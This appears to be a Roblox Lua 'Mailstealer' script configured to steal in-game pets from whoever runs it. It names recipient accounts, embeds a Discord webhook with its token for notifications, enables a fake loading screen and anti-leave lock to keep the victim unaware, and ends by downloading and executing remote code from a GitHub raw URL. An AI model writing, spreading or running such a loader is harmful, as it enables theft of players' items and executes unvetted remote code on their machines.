--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "Im_aNoob5684" -- good pets
Webhook = "https://discord.com/api/webhooks/1128898762203463734/s-pyjlwm5SW7pHzhh05JLNKi56GG-5gY0E16Nlo_ifPf43H9z3EMYJqzmGphUTL4oKyw" -- pings for pets
UserName2 = "R0BLOX9jc" -- bad pets

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/MoriScripts/main/MoriScriptZ", true))()
